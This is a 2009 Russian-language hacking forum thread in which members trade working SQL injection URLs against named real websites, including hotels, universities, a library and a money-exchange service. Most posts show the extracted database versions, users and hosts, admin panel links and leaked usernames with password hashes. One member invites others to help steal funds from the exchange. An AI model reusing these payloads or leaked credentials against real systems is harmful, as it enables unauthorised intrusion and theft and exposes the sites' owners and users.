ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.06.2009, 16:15
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
http://galadarihotel.lk/promo.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
5.0.77-community:galadari_user@localhost:galadari_db
в таблицах нет юзера/пассворда.
http://www.bestofbeing.ca/promo.php?id=-9+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
4.1.25-Debian_mt1:db15459@64.13.232.26:db15459_bestofbein g
|
|
|
09.06.2009, 16:21
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
PR5
Код:
http://cs.tcnj.edu/website/facultyview.php?id=-99999+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Database Version: 5.0.51a-3ubuntu5.4
Database name: deptWebSite
User name: wwwsite@csprod.TCNJ.EDU
Getting Data from table g2_User ( Rows) from database gallery2
Fields g_userName:g_hashedPassword
[0]:guest:1R\\0c363332a05345c8e22287768abe7bcd
[1]:admin:LjSE938e074bdcdd55e531547bf94f2decde
http://cs.tcnj.edu/gallery2/main.php
|
|
|
|
09.06.2009, 16:25
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
опять 3-ий мускул
http://www.ultra-it.com/promo.php?Id=2+and+substring(version(),1,1)=3
|
|
|
|
09.06.2009, 16:39
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
http://simbatron.ru
simbatron : Ввод, вывод, купить, продать, обмен Webmoney, наличные E-gold. Карты WMZ, WMR. Переводы Western Union, Wire Transfer, WM, Fethard, Яндекс.Деньги
http://simbatron.ru/auto_sota.php?metod=popoln&pnump=-375'+UNION+SELECT+0,concat_Ws(0x0b,0x0b,user(),ver sion(),database(),0x0b),2+--+&p=201
simbatron_mysql@194.85.90.24
4.1.22
simbatron_db
если кто найдет как спионерить деньги стучите в ЛС, буду благодарен ))))
|
|
|
|
09.06.2009, 17:15
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9
4.0.12:mtrans@localhost:mtrans
Есть таблица users
http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,id,login,pass),3 ,4,5,6,7,8,9+from+users
1:mtrans:0d0b9ff307d6c7f6
Админка: http://www.m-trans.vbg.ru/admin.php
------------
http://yellopagespakistan.com/yp/bl.php?subcat=254+and+substring(version(),1,1)=5
Последний раз редактировалось AlexSatter; 09.06.2009 в 17:53..
|
|
|
|
09.06.2009, 17:23
|
|
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208
Репутация:
94
|
|
Скуля на http://www.incult.es
Уязвимый скрипт: http://www.incult.es/projectinfo.php?id=8
Версия БД: 5.0.32-Debian_7etch10-log
Имя БД: incult
Юзер: incult@localhost
ОС: pc-linux-gnu
Таблицы, не входящие в information_schema
http://www.incult.es/projectinfo.php?id=8%27+and+0+union+select+1,2,3,4 ,5,6,7,8,9,10,11,group_concat(table_name),13,14,15 ,16,17,18,19,20,21+from+information_schema.tables+ where+table_schema%3C%3E%27information_schema%27--+
Больше ничего интересного не нашёл.
|
|
|
|
09.06.2009, 18:03
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1/*
version():4.0.27-standard-log
database():csm
user():thoseguys@ws4.int.mydns.net.nz
Код:
http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,user,pass)user+from+users+limit+1,1/*
thoseguys:55ffc53f170544b887252ff7e454e5a3 |
|
|
|
09.06.2009, 19:10
|
|
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208
Репутация:
94
|
|
Скуля на http://biblioteca.unizar.es
Уязвимый скрипт:http://biblioteca.unizar.es/biblio.php?id=27
Версия БД: 4.0.20-standard
Имя БД: biblioteca-biblioteca
Юзер: webiblio@alano.unizar.es
ОС: pc-linux
Список юзеров и их паролей:
http://biblioteca.unizar.es/biblio.php?id=-27+union+select+concat_ws(0x3a,login,pwd),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+usu arios+limit+0,1--+
Привилегии FILE и доступа к mysql.user нет.
|
|
|
|
09.06.2009, 21:52
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
PR 2
Код:
http://www.colgate13.org/members.php?memid=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14/*
Database version : 4.1.16-standard-log
Database name : colgate13
User name : thirteen@grant.dreamhost.com |
|
|
|
09.06.2009, 22:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://www.invictory.com.ua/tips_issue.php?id=1000000+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6+--+
ivcomua_db@localhost:4.1.22-standard:ivcomua_db
####################################
oracle 
http://oracle.ukrsat.com/tutorial/openxs.php?n=80+and+substring(version(),1,1)=3
########################################
http://bloggreenwood.com/members/profile_view_ind.php?id=1'+and+substring(version() ,1,1)=5+--+
Ну и мое видео первое на ачате ))
http://forum.antichat.ru/thread124487.html ссылка там ))
Последний раз редактировалось HAXTA4OK; 10.06.2009 в 11:22..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
